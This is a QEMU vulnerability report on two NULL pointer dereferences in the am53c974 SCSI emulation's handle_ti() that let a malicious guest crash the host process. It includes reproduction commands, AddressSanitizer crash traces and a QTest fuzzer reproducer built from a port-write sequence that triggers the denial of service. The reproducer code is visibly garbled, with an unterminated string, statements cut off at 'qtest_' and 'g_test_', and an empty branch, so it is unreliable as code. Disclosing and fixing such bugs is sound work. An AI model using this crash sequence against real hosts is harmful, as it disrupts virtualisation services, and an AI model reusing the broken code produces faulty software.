Two NULL pointer dereference issues were found in the am53c974 SCSI host bus adapter emulation of QEMU. They could occur while handling the 'Information Transfer' command (CMD_TI) in function handle_ti() in hw/scsi/esp.c, and could be abused by a malicious guest to crash the QEMU process on the host resulting in a denial of service.
Both issues were reported by Cheolwoo Myung (Seoul National University). To reproduce them, configure and run QEMU as follows. Please find attached the required disk images.
$ ./configure --target-list=x86_64-softmmu --enable-kvm --enable-sanitizers
$ make
$ ./qemu-system-x86_64 -m 512 -drive file=./hyfuzz.img,index=0,media=disk,format=raw \
-device am53c974,id=scsi -device scsi-hd,drive=SysDisk \
-drive id=SysDisk,if=none,file=./disk.img
Additional info:
RHBZ: https://bugzilla.redhat.com/show_bug.cgi?id=1909766
RHBZ: https://bugzilla.redhat.com/show_bug.cgi?id=1909769
ASAN logs:
==672133==
hw/scsi/scsi-bus.c:1385:12: runtime error: member access within null pointer of type 'struct SCSIRequest'
AddressSanitizer:DEADLYSIGNAL
=================================================================
==672133==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000171 (pc 0x55bd63e20b85 bp 0x7f4b6fffdfa0 sp 0x7f4b6fffdf70 T7)
==672133==The signal is caused by a READ memory access.
==672133==Hint: address points to the zero page.
#0 0x55bd63e20b85 in scsi_req_continue hw/scsi/scsi-bus.c:1385
#1 0x55bd63ab34fb in esp_do_dma hw/scsi/esp.c:453
#2 0x55bd63ab4b3c in handle_ti hw/scsi/esp.c:549
#3 0x55bd63ab72a9 in esp_reg_write hw/scsi/esp.c:691
#4 0x55bd63d7b5dd in esp_pci_io_write hw/scsi/esp-pci.c:206
#5 0x55bd645d55a3 in memory_region_write_accessor softmmu/memory.c:491
#6 0x55bd645d5a24 in access_with_adjusted_size softmmu/memory.c:552
#7 0x55bd645e2baa in memory_region_dispatch_write softmmu/memory.c:1501
#8 0x55bd646b75ff in flatview_write_continue softmmu/physmem.c:2759
#9 0x55bd646b79d1 in flatview_write softmmu/physmem.c:2799
#10 0x55bd646b8341 in address_space_write softmmu/physmem.c:2891
#11 0x55bd646b83f9 in address_space_rw softmmu/physmem.c:2901
#12 0x55bd648c4736 in kvm_handle_io accel/kvm/kvm-all.c:2285
#13 0x55bd648c69c8 in kvm_cpu_exec accel/kvm/kvm-all.c:2531
#14 0x55bd647b2413 in kvm_vcpu_thread_fn accel/kvm/kvm-cpus.c:49
#15 0x55bd64f560de in qemu_thread_start util/qemu-thread-posix.c:521
#16 0x7f4b981763f8 in start_thread (/lib64/libpthread.so.0+0x93f8)
#17 0x7f4b980a3902 in __GI___clone (/lib64/libc.so.6+0x101902)
---
==672020==
hw/scsi/esp.c:196:62: runtime error: member access within null pointer of type 'struct SCSIDevice'
AddressSanitizer:DEADLYSIGNAL
=================================================================
==672020==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000098 (pc 0x559bc99946fd bp 0x7f08bd737fb0 sp 0x7f08bd737f70 T7)
==672020==The signal is caused by a READ memory access.
==672020==Hint: address points to the zero page.
#0 0x559bc99946fd in do_busid_cmd hw/scsi/esp.c:196
#1 0x559bc9994e71 in do_cmd hw/scsi/esp.c:220
#2 0x559bc999ae81 in handle_ti hw/scsi/esp.c:555
#3 0x559bc999d2a9 in esp_reg_write hw/scsi/esp.c:691
#4 0x559bc9c615dd in esp_pci_io_write hw/scsi/esp-pci.c:206
#5 0x559bca4bb5a3 in memory_region_write_accessor softmmu/memory.c:491
#6 0x559bca4bba24 in access_with_adjusted_size softmmu/memory.c:552
#7 0x559bca4c8baa in memory_region_dispatch_write softmmu/memory.c:1501
#8 0x559bca59d5ff in flatview_write_continue softmmu/physmem.c:2759
#9 0x559bca59d9d1 in flatview_write softmmu/physmem.c:2799
#10 0x559bca59e341 in address_space_write softmmu/physmem.c:2891
#11 0x559bca59e3f9 in address_space_rw softmmu/physmem.c:2901
#12 0x559bca7aa736 in kvm_handle_io accel/kvm/kvm-all.c:2285
#13 0x559bca7ac9c8 in kvm_cpu_exec accel/kvm/kvm-all.c:2531
#14 0x559bca698413 in kvm_vcpu_thread_fn accel/kvm/kvm-cpus.c:49
#15 0x559bcae3c0de in qemu_thread_start util/qemu-thread-posix.c:521
#16 0x7f08e57ba3f8 in start_thread (/lib64/libpthread.so.0+0x93f8)
#17 0x7f08e56e7902 in __GI___clone (/lib64/libc.so.6+0x101902)
QTest Reproducer for the first:
/*
* Autogenerated Fuzzer Test Case
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
* See the COPYING file in the top-level directory.
*/
#include "qemu/osdep.h"
#include "libqos/libqtest.h"
/*
* cat << EOF | ./qemu-system-i386 -display none -machine accel=qtest, -m \
* 512M -device am53c974,id=scsi -device scsi-hd,drive=disk0 -drive \
* id=disk0,
* outl 0xcf8 0x80001010
* outl 0xcfc 0xc000
* outl 0xcf8 0x80001004
* outw 0xcfc 0x05
* outb 0xc046 0x02
* outl 0xc00b 0xc100
* outl 0xc040 0x03
* outl 0xc040 0x03
* write 0x0 0x1 0x41
* outl 0xc00b 0xc100
* outw 0xc040 0x02
* outw 0xc040 0x81
* outl 0xc00b 0x9000
* EOF
*/
static void test_fuzz(void)
{
QTestState *s = qtest_init(
"-display none , -m 512M -device am53c974,id=scsi -device "
qtest_outl(s, 0xcf8, 0x80001010);
qtest_outl(s, 0xcfc, 0xc000);
qtest_outl(s, 0xcf8, 0x80001004);
qtest_outw(s, 0xcfc, 0x05);
qtest_outb(s, 0xc046, 0x02);
qtest_outl(s, 0xc00b, 0xc100);
qtest_outl(s, 0xc040, 0x03);
qtest_outl(s, 0xc040, 0x03);
qtest_
qtest_outl(s, 0xc00b, 0xc100);
qtest_outw(s, 0xc040, 0x02);
qtest_outw(s, 0xc040, 0x81);
qtest_outl(s, 0xc00b, 0x9000);
qtest_quit(s);
}
int main(int argc, char **argv)
{
const char *arch = qtest_get_arch();
g_test_
if (strcmp(arch, "i386") == 0) {
}
return g_test_run();
}